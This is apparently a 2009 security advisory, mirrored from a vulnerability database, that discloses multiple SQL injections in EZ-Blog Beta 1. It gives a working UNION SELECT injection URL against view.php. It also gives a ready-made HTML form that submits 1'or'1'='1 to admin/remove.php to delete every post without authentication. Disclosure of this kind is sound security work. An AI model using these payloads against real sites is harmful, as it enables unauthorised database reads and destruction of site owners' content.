EZ-Blog Beta 1 Multiple SQL Injection

2009-03-0200:00:00

vulners.com

JSON

******* Salvatore "drosophila" Fresta *******

Application: EZ-Blog
http://sourceforge.net/projects/ez-blog/
Version: Beta 1
Bug: * Multiple SQL Injection
Exploitation: Remote
Date: 1 Mar 2009
Discovered by: Salvatore "drosophila" Fresta
Author: Salvatore "drosophila" Fresta
e-mail: [email protected]

BUGS

SQL Injection:

    Requisites: magic_quotes_gpc = off

    This is a crazy application because it not
    require authentication for posting, deleting,
    etc. and it is entirely vulnerable to SQL
    Injection, as follows:
    
    http://site/path/public/view.php?storyid=-1&#39; UNION ALL SELECT

1,2,3,4,5,6,7,8,9,10%23

    There aren&#39;t hight reserved information on the
    database, but it is possible to cause inconvenience.
    The following injection allow to delete all
    posts:
    
    &lt;form action=&quot;http://site/path/admin/remove.php&quot; method=&quot;POST&quot;&gt;
        &lt;input type=&quot;hidden&quot; name=&quot;kill&quot; value=&quot;1&#39;or&#39;1&#39;=&#39;1&quot;&gt;
        &lt;input type=&quot;hidden&quot; name=&quot;confirm&quot; value=&quot;1&quot;&gt;
        &lt;input type=&quot;hidden&quot; name=&quot;rm&quot; value=&quot;true&quot;&gt;
        &lt;input type=&quot;submit&quot; value=&quot;Exploit&quot;&gt;
    &lt;/form&gt;

–
Salvatore "drosophila" Fresta
CWNP444351

JSON